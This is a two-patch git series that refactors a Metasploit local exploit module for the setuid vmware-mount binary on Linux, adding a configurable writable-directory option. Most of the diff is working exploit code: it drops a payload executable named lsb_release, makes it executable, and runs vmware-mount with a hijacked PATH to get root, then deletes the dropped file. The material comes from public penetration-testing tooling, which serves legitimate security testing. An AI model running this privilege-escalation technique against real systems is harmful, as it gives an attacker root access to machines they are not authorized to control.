From 25ecf73d7d472a84fa5c50d6623c23203e585e0f Mon Sep 17 00:00:00 2001 From: Rasta Mouse Date: Thu, 27 Nov 2014 17:12:37 +0000 Subject: [PATCH 1/2] Add configurable directory, rather than relying on the session working directory. --- modules/exploits/linux/local/vmware_mount.rb | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/modules/exploits/linux/local/vmware_mount.rb b/modules/exploits/linux/local/vmware_mount.rb index 17510b7118..cd089b38b6 100644 --- a/modules/exploits/linux/local/vmware_mount.rb +++ b/modules/exploits/linux/local/vmware_mount.rb @@ -53,6 +53,9 @@ class Metasploit4 < Msf::Exploit::Local 'DisclosureDate' => "Aug 22 2013" } )) + register_options([ + OptString.new("WritableDir", [ true, "A directory where you can write files.", "/tmp" ]), + ], self.class) end def check @@ -68,13 +71,13 @@ class Metasploit4 < Msf::Exploit::Local fail_with(Failure::NotVulnerable, "vmware-mount doesn't exist or is not setuid") end - write_file("lsb_release", generate_payload_exe) - - cmd_exec("chmod +x lsb_release") - cmd_exec("PATH=.:$PATH /usr/bin/vmware-mount") + path = "#{datastore["WritableDir"]}" + write_file("#{path}/lsb_release", generate_payload_exe) + cmd_exec("chmod +x #{path}/lsb_release") + cmd_exec("PATH=#{path}:$PATH /usr/bin/vmware-mount") # Delete it here instead of using FileDropper because the original # session can clean it up - cmd_exec("rm -f lsb_release") + cmd_exec("rm -f #{path}/lsb_release") end def setuid?(remote_file) From 985838e999d0263679ec13a89f59813dadd1c288 Mon Sep 17 00:00:00 2001 From: Rasta Mouse Date: Thu, 27 Nov 2014 21:38:50 +0000 Subject: [PATCH 2/2] Suggestions from OJ --- modules/exploits/linux/local/vmware_mount.rb | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/modules/exploits/linux/local/vmware_mount.rb b/modules/exploits/linux/local/vmware_mount.rb index cd089b38b6..93cb8106d5 100644 --- a/modules/exploits/linux/local/vmware_mount.rb +++ b/modules/exploits/linux/local/vmware_mount.rb @@ -54,7 +54,7 @@ class Metasploit4 < Msf::Exploit::Local } )) register_options([ - OptString.new("WritableDir", [ true, "A directory where you can write files.", "/tmp" ]), + OptString.new("WRITABLEDIR", [ true, "A directory where you can write files.", "/tmp" ]), ], self.class) end @@ -71,13 +71,14 @@ class Metasploit4 < Msf::Exploit::Local fail_with(Failure::NotVulnerable, "vmware-mount doesn't exist or is not setuid") end - path = "#{datastore["WritableDir"]}" - write_file("#{path}/lsb_release", generate_payload_exe) - cmd_exec("chmod +x #{path}/lsb_release") - cmd_exec("PATH=#{path}:$PATH /usr/bin/vmware-mount") + lsb_path = File.join(datastore['WRITABLEDIR'], 'lsb_release') + write_file(lsb_path, generate_payload_exe) + cmd_exec("chmod +x #{lsb_path}") + cmd_exec("PATH=#{datastore['WRITABLEDIR']}:$PATH /usr/bin/vmware-mount") # Delete it here instead of using FileDropper because the original # session can clean it up - cmd_exec("rm -f #{path}/lsb_release") + cmd_exec("rm -f #{lsb_path}") + end def setuid?(remote_file)